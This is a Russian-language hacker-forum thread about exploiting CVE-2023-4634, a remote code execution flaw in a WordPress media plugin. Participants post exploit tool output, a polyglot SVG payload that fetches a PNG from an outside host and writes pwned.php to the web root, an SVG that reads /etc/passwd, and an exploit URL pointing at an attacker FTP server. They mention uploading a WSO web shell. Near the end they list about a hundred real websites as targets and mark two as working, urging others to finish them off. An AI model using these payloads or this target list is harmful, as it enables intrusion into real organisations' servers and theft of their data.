Wordpress Plugin Media-Library Plugin | RCE | CVE-2023-4634

PoC https://github.com/Patrowl/CVE-2023-4634
70,000+ active installations
WSO заливается отлично

 

Вот этот десткий садик про WSO не обязательно дописывать, достаточно просто информации про эксплоит.

 

Пришлось поборотся с установкой, код зависим от версии 3.9+ иначе будет улетать в ошибку от grequests.
По мимо прочего не хватает pillow. В случае с deb:11 (python3.11*) для корректной установки запускал с флагом

Code:

python3 -m pip install -r requirements.txt --break-system-packages

Поясните за заливку:

Code:

[-] Checking arguments
   [-] All arguments for exploiting target are set, beginning the first checks
   [-] The remote FTP polyglot SVG/MSL file is reachable
   [-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
   [-] A sample remote FTP exploiter VID test file is reachable
   [-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
   [-] The remote Exploit PNG/PHP file is reachable
[!] All arguments have been checked correctly, lauching exploitation
[-] Lauching 100 Threads on long SVG
[-] Waiting 5 second for the file to be created
[-] Starting Bruteforcing with VID exploiters
[-] Checking the drop of pwned.php
   [!] Not yet, try 1 on 9 ... checking again in 10 seconds
   [!] Not yet, try 2 on 9 ... checking again in 10 seconds
   [!] Not yet, try 3 on 9 ... checking again in 10 seconds
   [!] Not yet, try 4 on 9 ... checking again in 10 seconds
   [!] Not yet, try 5 on 9 ... checking again in 10 seconds
   [!] Not yet, try 6 on 9 ... checking again in 10 seconds
   [!] Not yet, try 7 on 9 ... checking again in 10 seconds
   [!] Not yet, try 8 on 9 ... checking again in 10 seconds
   [!] Not yet, try 9 on 9 ... checking again in 10 seconds
   [!] Exploit has not worked, try by increase concurrency value or use another method

Прав на корень не хватает? Крутим старые добрые пути к --exploitname one/way/upload/pwned.php ?
UPD: мимо

Code:

grep exploitname CVE-2023-4634.py
        '--exploitname',
    exploitname = args.exploitname
        if not svg_polyglot_name or not svg_exploiter_names or not remotehttp or not png_polyglot_name or not webserverpath or not exploitname:
            print(colored("\t\t[x] The --svg_polyglot_name, --svg_exploiter_names, --remotehttp, --png_polyglot_name, --webserverpath and --exploitname options are needed to create the SVG/MSL Polyglot file", "red"))
    </image>""" % { "remotehttp": remotehttp +"/"+png_polyglot_name , "webserverpath" : webserverpath+"/"+exploitname }
    elif target and remoteftp and remotehttp and svg_polyglot_name and svg_exploiter_names and png_polyglot_name and exploitname:
        print(colored("[-] Checking the drop of "+exploitname, "cyan"))
        target_virus = target+"/"+exploitname

upd:
непонятно, в poly.svg захардкожен путь:

cat remote_ftp/poly.svg

Code:

<?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="http://123.123.123.123:80/virus.png" />
    <resize geometry="400x400" />
    <write filename="/var/www/html/pwned.php" />
    <get width="base-width" height="base-height" />
    <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <image xlink:href="http://192.192.192.23:1664/neverExist.svg" height="100" width="100"/>
    </svg>

Ручное поднятие ftp с открытым анонимным пользователем и заливка 2х svg (1.svg + 1.svg[0])

Code:

<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:/etc/passwd" width="500" height="500" />
</svg>

При переходе:

Code:

http://site/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600

Отдает картинку без контента. Те тупо белый фон, как не меняй *height + width

Code:

--webserverpath WEBSERVERPATH
                        Path of the webserver on the victim server (could be found with the LFI and wp-config file) 
example: /var/www/html
https://github.com/Patrowl/CVE-2023-4634/issues/2

а может и не быть найден, нужно тестить на локалке. Если кто-то реально использует или соберется тестировать, отпишите.

 

Сегодня вечером на локалке немного тестили, получили странные результаты, завтра будем продолжать. НИПАНЯТНА одним словом, конект к FTP есть а в логах GS ругается. Или нужен специфический SVG или правильные policy для imagemagic еще до конца сам не понял. Дефольтный конфиг Debian 12 не пробился. На парочке рил-таргетов svg отработал, но только рисовалка, прочитать текст через text:/etc/passwd не удалось.
Если есть желающие присоединиться к нашим веселым посиделкам хекерским, пишите.

 

Рисование содержимого фаила поверх картинки при помощи mla_debug ака LFI.

Code:

...you can try adding mla_debug=true ... this will display a lot of ugly debug information on the screen...

Насколько я понимаю уродливая информация поверх картинки в нашем ключе это как раз отрисовка /etc/passwd
Пример на первый взгляд кажется ошибочным:

Code:

<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:/etc/passwd" width="500" height="500" />
</svg>

Но именно ошибка дает возможность вывести данные при помощи mla_debug=true, для меня пока осталось непонятным какие зависомости нужно учесть.
Очень привередливая бага.
Фича: wp-content/plugins/media-library-assistant/readme.txt - дает возможность узнать версию плагина.
на данный момент тестировал вывод лога в :

Code:

= 3.06 =
= 2.79 =
= 3.04 =

 

Ну файлики читать мы разобрались, работает. Есть пару моментов но работает. А вот RCE пока что не видели на таргетах.
На данный момент даже не ясно почему на некоторых таргетах читалка работает а где-то нет. Подняли локалку, все условия вроде бы как соблюдены, но "читалка" не сработала. Возможно играет роль версии IM или GS.

 

сотка ресов с разными версиями, уже многие обновились c последнего моего скана. У самого ничего не получилось с этой CVE

Code:

http://theblemish.com/wp-content/plugins/media-library-assistant/readme.txt
http://funnymedianews.com/wp-content/plugins/media-library-assistant/readme.txt
http://bonehealthandosteoporosis.org/wp-content/plugins/media-library-assistant/readme.txt
http://tabacshop.ch/wp-content/plugins/media-library-assistant/readme.txt
http://nmuofficial.com/wp-content/plugins/media-library-assistant/readme.txt
http://sirabee.com/wp-content/plugins/media-library-assistant/readme.txt
http://hometownhealthcenter.org/wp-content/plugins/media-library-assistant/readme.txt
http://aqleeat.com/wp-content/plugins/media-library-assistant/readme.txt
http://talkingpointsmemo.com/wp-content/plugins/media-library-assistant/readme.txt
http://weltwoche.de/wp-content/plugins/media-library-assistant/readme.txt
http://perishablenews.com/wp-content/plugins/media-library-assistant/readme.txt
http://cbm.ch/wp-content/plugins/media-library-assistant/readme.txt
http://desafio21diassemcarne.com.br/wp-content/plugins/media-library-assistant/readme.txt
http://themagicforless.com/wp-content/plugins/media-library-assistant/readme.txt
http://catholicnews.com/wp-content/plugins/media-library-assistant/readme.txt
http://elberadweg.de/wp-content/plugins/media-library-assistant/readme.txt
http://aryan-solutions.com/wp-content/plugins/media-library-assistant/readme.txt
http://lightnovelstranslations.com/wp-content/plugins/media-library-assistant/readme.txt
http://ame-name.com/wp-content/plugins/media-library-assistant/readme.txt
http://arpc.gov.au/wp-content/plugins/media-library-assistant/readme.txt
http://brainright.com/wp-content/plugins/media-library-assistant/readme.txt
http://figment.live/wp-content/plugins/media-library-assistant/readme.txt
http://fpta.pt/wp-content/plugins/media-library-assistant/readme.txt
http://tm-consulting.ru/wp-content/plugins/media-library-assistant/readme.txt
http://maxlucado.com/wp-content/plugins/media-library-assistant/readme.txt
http://plumamazing.com/wp-content/plugins/media-library-assistant/readme.txt
http://trolleymuseum.org/wp-content/plugins/media-library-assistant/readme.txt
http://grapplersguide.com/wp-content/plugins/media-library-assistant/readme.txt
http://inventorysource.com/wp-content/plugins/media-library-assistant/readme.txt
http://disneynews.us/wp-content/plugins/media-library-assistant/readme.txt
http://militaryscalemodelling.com/wp-content/plugins/media-library-assistant/readme.txt
http://infonomics-society.org/wp-content/plugins/media-library-assistant/readme.txt
http://croci.net/wp-content/plugins/media-library-assistant/readme.txt
http://unexmin.eu/wp-content/plugins/media-library-assistant/readme.txt
http://historicjamestowne.org/wp-content/plugins/media-library-assistant/readme.txt
http://sis.us/wp-content/plugins/media-library-assistant/readme.txt
http://shambhala.org/wp-content/plugins/media-library-assistant/readme.txt
http://localpedia.de/wp-content/plugins/media-library-assistant/readme.txt
http://phantis.com/wp-content/plugins/media-library-assistant/readme.txt
http://vintagelittlelady.com/wp-content/plugins/media-library-assistant/readme.txt
http://uka.org.uk/wp-content/plugins/media-library-assistant/readme.txt
http://thfoods.com/wp-content/plugins/media-library-assistant/readme.txt
http://flingtrainer.com/wp-content/plugins/media-library-assistant/readme.txt
http://trulucks.com/wp-content/plugins/media-library-assistant/readme.txt
http://cvsu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
http://globalrallycross.com/wp-content/plugins/media-library-assistant/readme.txt
http://polkadotwedding.com/wp-content/plugins/media-library-assistant/readme.txt
http://yosmart.com/wp-content/plugins/media-library-assistant/readme.txt
http://tretavazrast.com/wp-content/plugins/media-library-assistant/readme.txt
http://alumni.ucd.ie/wp-content/plugins/media-library-assistant/readme.txt
http://research.lifeway.com/wp-content/plugins/media-library-assistant/readme.txt
http://ack.ug.edu.pl/wp-content/plugins/media-library-assistant/readme.txt
http://library.mwit.ac.th/wp-content/plugins/media-library-assistant/readme.txt
http://shop.dtwrestling.com/wp-content/plugins/media-library-assistant/readme.txt
http://zip-tokens.com.customers.tigertech.net/wp-content/plugins/media-library-assistant/readme.txt
http://elrecanv.vh122.hosterby.com/wp-content/plugins/media-library-assistant/readme.txt
http://hotel.rosenthal.de/wp-content/plugins/media-library-assistant/readme.txt
http://alumni.pensacolastate.edu/wp-content/plugins/media-library-assistant/readme.txt
http://studio.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
http://studio-rc.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
http://studio-stage.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
http://brandstore.wabco-auto.com/wp-content/plugins/media-library-assistant/readme.txt
http://shop.transition-news.org/wp-content/plugins/media-library-assistant/readme.txt
http://web.csg.org/wp-content/plugins/media-library-assistant/readme.txt
http://shop.glciran.com/wp-content/plugins/media-library-assistant/readme.txt
http://th.kumonglobal.com/wp-content/plugins/media-library-assistant/readme.txt
http://hrc.sfasu.edu/wp-content/plugins/media-library-assistant/readme.txt
http://m5.moonideas.com/wp-content/plugins/media-library-assistant/readme.txt
http://shop.nwfa.org/wp-content/plugins/media-library-assistant/readme.txt
http://elementor.inmak.net/wp-content/plugins/media-library-assistant/readme.txt
http://is.fourfaith.com/wp-content/plugins/media-library-assistant/readme.txt
http://buk.um.ac.id/wp-content/plugins/media-library-assistant/readme.txt
http://library.addu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
http://treasure.ready.jp/wp-content/plugins/media-library-assistant/readme.txt
http://centralny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://bostoncig.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://newhampshire.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://capitalregionny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://vermont.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://missionlifelineia.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://connecticut.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://southernnewengland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://newjersey.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://westernny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://cprblog.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://hudsonvalleyny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://rochester.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://massachusetts.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://longisland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://heartofuticagrants.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://nyc.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://maine.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://midatlantic.heart.org/wp-content/plugins/media-library-assistant/readme.txt
http://applicants.mta.ac.il/wp-content/plugins/media-library-assistant/readme.txt
http://33213.dcpserver.de/wp-content/plugins/media-library-assistant/readme.txt
http://library.joshibi.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
http://clubcurator.golftec.com/wp-content/plugins/media-library-assistant/readme.txt
http://byrne.pinelandsalliance.org/wp-content/plugins/media-library-assistant/readme.txt
http://teacherpress.ocps.net/wp-content/plugins/media-library-assistant/readme.txt
http://hrlms.ipro.org/wp-content/plugins/media-library-assistant/readme.txt
http://nyushi.otaru-uc.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
http://netmedia.kanto-gakuin.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
http://nasukashi.niye.go.jp/wp-content/plugins/media-library-assistant/readme.txt

 

для RCE нужен путь

тут работает, быстро чекнули, добивай)

Code:

midatlantic.heart.org
clubcurator.golftec.com